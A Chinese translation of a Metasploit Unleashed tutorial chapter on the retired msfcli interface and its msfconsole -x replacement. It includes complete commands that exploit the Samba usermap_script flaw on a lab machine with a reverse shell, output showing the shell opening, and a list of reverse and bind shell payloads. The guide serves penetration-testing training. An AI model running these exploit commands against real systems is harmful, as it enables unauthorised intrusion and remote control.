metasploit unleashed(Chinese Simplified Edition)-7

metasploit基础

Msfcli

什么是Msfcli

msfcli为框架提供了强大的命令行界面。 这使您可以轻松地将Metasploit漏洞利用添加到您可能创建的任何脚本中。
注意:截至2015-06-18 msfcli已被删除。 通过msfconsole获得类似功能的一种方法是使用-x选项。 例如,以下命令设置samba / usermap_script的所有选项,并针对目标运行它:

root@kali:~# msfconsole -x "use exploit/multi/samba/usermap_script;\
set RHOST 172.16.194.172;\
set PAYLOAD cmd/unix/reverse;\
set LHOST 172.16.194.163;\
run"

命令行界面命令

运行msfcli的help命令

root@kali:~# msfcli -h
Usage: /usr/bin/msfcli   [mode]
===========================================================

    Mode           Description
    ----           -----------
    (A)dvanced     Show available advanced options for this module
    (AC)tions      Show available actions for this auxiliary module
    (C)heck        Run the check routine of the selected module
    (E)xecute      Execute the selected module
    (H)elp         You're looking at it baby!
    (I)DS Evasion  Show available ids evasion options for this module
    (O)ptions      Show available options for this module
    (P)ayloads     Show available payloads for this module
    (S)ummary      Show information about this module
    (T)argets      Show available targets for this exploit module

Examples:
msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=IP E
msfcli auxiliary/scanner/http/http_version rhosts=IP encoder= post= nop= E

注意,使用msfcli时使用=来分配变量,并且所有选项都区分大小写

root@kali:~# msfcli exploit/multi/samba/usermap_script RHOST=172.16.194.172 PAYLOAD=cmd/unix/reverse LHOST=172.16.194.163 E
[*] Please wait while we load the module tree...
 
                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##


       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 936 exploits - 500 auxiliary - 151 post
+ -- --=[ 252 payloads - 28 encoders - 8 nops
       =[ svn r15767 updated today (2012.08.22)

RHOST => 172.16.194.172
PAYLOAD > cmd/unix/reverse
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo cSKqD83oiquo0xMr;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "cSKqD83oiquo0xMr\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (172.16.194.163:4444 -> 172.16.194.172:57682) at 2012-06-14 09:58:19 -0400

uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

如果您不完全确定哪些选项属于特定的模块,则可以将字母O附加到字符串末尾,无论您在哪儿碰到这种情况。

root@kali:~# msfcli exploit/multi/samba/usermap_script O
[*] Initializing modules...

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port```

为了显示当前模块可用的payload,在msfcli命令行后面添加字母p


root@kali:~# msfcli exploit/multi/samba/usermap_script P
[*]Initializing modules...

Compatible payloads
===================

   Name                                Description
   ----                                -----------
   cmd/unix/bind_awk                   Listen for a connection and spawn a command shell via GNU AWK
   cmd/unix/bind_inetd                 Listen for a connection and spawn a command shell (persistent)
   cmd/unix/bind_lua                   Listen for a connection and spawn a command shell via Lua
   cmd/unix/bind_netcat                Listen for a connection and spawn a command shell via netcat
   cmd/unix/bind_netcat_gaping         Listen for a connection and spawn a command shell via netcat
   cmd/unix/bind_netcat_gaping_ipv6    Listen for a connection and spawn a command shell via netcat
   cmd/unix/bind_perl                  Listen for a connection and spawn a command shell via perl
   cmd/unix/bind_perl_ipv6             Listen for a connection and spawn a command shell via perl
   cmd/unix/bind_ruby                  Continually listen for a connection and spawn a command shell via Ruby
   cmd/unix/bind_ruby_ipv6             Continually listen for a connection and spawn a command shell via Ruby
   cmd/unix/bind_zsh                   
        Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is
        often available, please be aware it isn't usually installed by default.
      
   cmd/unix/generic                    Executes the supplied command
   cmd/unix/reverse                    Creates an interactive shell through two inbound connections
   cmd/unix/reverse_awk                Creates an interactive shell via GNU AWK
   cmd/unix/reverse_lua                Creates an interactive shell via Lua
   cmd/unix/reverse_netcat             Creates an interactive shell via netcat
   cmd/unix/reverse_netcat_gaping      Creates an interactive shell via netcat
   cmd/unix/reverse_openssl            Creates an interactive shell through two inbound connections
   cmd/unix/reverse_perl               Creates an interactive shell via perl
   cmd/unix/reverse_perl_ssl           Creates an interactive shell via perl, uses SSL
   cmd/unix/reverse_php_ssl            Creates an interactive shell via php, uses SSL
   cmd/unix/reverse_python             Connect back and create a command shell via Python
   cmd/unix/reverse_python_ssl         Creates an interactive shell via python, uses SSL, encodes with base64 by design.
   cmd/unix/reverse_ruby               Connect back and create a command shell via Ruby
   cmd/unix/reverse_ruby_ssl           Connect back and create a command shell via Ruby, uses SSL
   cmd/unix/reverse_ssl_double_telnet  Creates an interactive shell through two inbound connections, encrypts using SSL via "-z" option
   cmd/unix/reverse_zsh                
        Connect back and create a command shell via Zsh.  Note: Although Zsh is often
        available, please be aware it isn't usually installed by default

### MSFcli交互的好处
.支持启动漏洞利用exploit和辅助模块auxiliary
.针对特定目标的可行性
.有助于学习
.在测试或者编写新的exploit方便使用
.一次性开发的好工具
.如果你明确知道哪些exploit和选项是你需要的这将会非常好用
.在脚本和基础的自动化利用时非常好用


msfcli唯一真正的缺点是它不像msfconsole那样受支持,它一次只能处理一个shell,这对客户端攻击来说是不切实际的。 它也不支持msfconsole的任何高级自动化功能。
展开阅读全文

没有更多推荐了,返回首页